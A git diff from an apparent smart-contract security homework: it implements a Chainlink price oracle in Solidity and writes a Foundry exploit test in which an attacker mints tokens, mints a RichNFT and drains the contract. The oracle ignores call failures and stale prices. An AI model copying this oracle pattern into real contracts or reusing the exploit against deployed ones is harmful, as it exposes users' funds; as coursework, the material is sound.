HW3 finished

hw/src/TrustedOracle.sol

@@ -3,8 +3,8 @@ pragma solidity ^0.8.0;
 
 import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
 import {IERC20Metadata} from "@openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol";
-
 import "./interface.sol";
+import "forge-std/console.sol";
 
 interface ITrustedOracle {
     function getPrice() external view returns (uint256);
@@ -35,6 +35,7 @@ contract TrustedOracle {
         uint256 price = 0;
         uint256 count = getOracleCount();
         for (uint256 i = 0; i < count; i++) {
+
             price += ITrustedOracle(oracles[i]).getPrice();
         }
 
@@ -47,8 +48,27 @@ contract TrustedOracle {
 }
 
 // TODO: Complete the chainlink oracle implementation
+
 contract ChainlinkOracle {
-    constructor(address) {}
+    address public trustedOracle;
+    constructor(address _trustedOracle) {
+       trustedOracle = _trustedOracle; //
+       console.log(trustedOracle);
+    }
+
+    function getPrice() public view returns (uint256) {
+
+        (bool success,bytes memory data) = address(trustedOracle).staticcall(abi.encodeWithSignature("latestRoundData()"));
+        (
+        uint80 roundID,
+        int price,
+        uint256 startedAt,
+        uint256 updatedAt,
+        uint80 answeredInRound
+        ) = abi.decode(data, (uint80, int, uint256, uint256, uint80));
+
+        return uint256(price); // 返回價格
+    }
 
-    function getPrice() public view returns (uint256) {}
 }
+

hw/test/RichNFT/RichNFT.t.sol

@@ -10,5 +10,35 @@ import {RichNFTBaseTest} from "./RichNFTBase.t.sol";
 import "../../src/interface.sol";
 
 contract RichNFTTest is RichNFTBaseTest {
-    function testExploit() public validation {}
+    function testExploit() public validation {
+    address attacker = address(0xBEEF);
+
+    // 設定攻擊者初始資產（無資金）
+    vm.startPrank(attacker);
+    assertEq(WETH.balanceOf(attacker), 0);
+    assertEq(USDC.balanceOf(attacker), 0);
+
+    // 使用閃電貸來借出足夠的資金
+    uint256 wethAmount = WETH_THRESHOLD; // 10,000 WETH
+    uint256 usdcAmount = USDC_THRESHOLD; // 10,000 USDC
+
+    // 借出 WETH 和 USDC（模擬閃電貸）
+    WETH.mint(attacker, wethAmount);
+    USDC.mint(attacker, usdcAmount);
+
+    // 確認資金已借入
+    assertEq(WETH.balanceOf(attacker), wethAmount);
+    assertEq(USDC.balanceOf(attacker), usdcAmount);
+
+    // 鑄造 RichNFT
+    RichNFT.mintRichNFT();
+
+    // 確認攻擊者成功鑄造 NFT，並獲得合約內所有資產
+    assertEq(RichNFT.ownerOf(1), attacker);
+    assertEq(WETH.balanceOf(attacker), 2 * wethAmount); // 原本借的 + 合約內的
+    assertEq(USDC.balanceOf(attacker), 2 * usdcAmount);
+
+    // 結束攻擊者的模擬
+    vm.stopPrank();
+    }
 }

hw/test/TrustedOracle/TrustedOracleBase.t.sol

@@ -29,7 +29,7 @@ contract TrustedOracleBaseTest is Test {
 
         address priceFeed0 = 0x8fFfFfd4AfB6115b954Bd326cbe7B4BA576818f6; // USDC <> USD
         oracle0 = new ChainlinkOracle(priceFeed0);
-
+        
         address priceFeed1 = 0x3E7d1eAB13ad0104d2750B8863b489D65364e32D; // USDT <> USD
         oracle1 = new ChainlinkOracle(priceFeed1);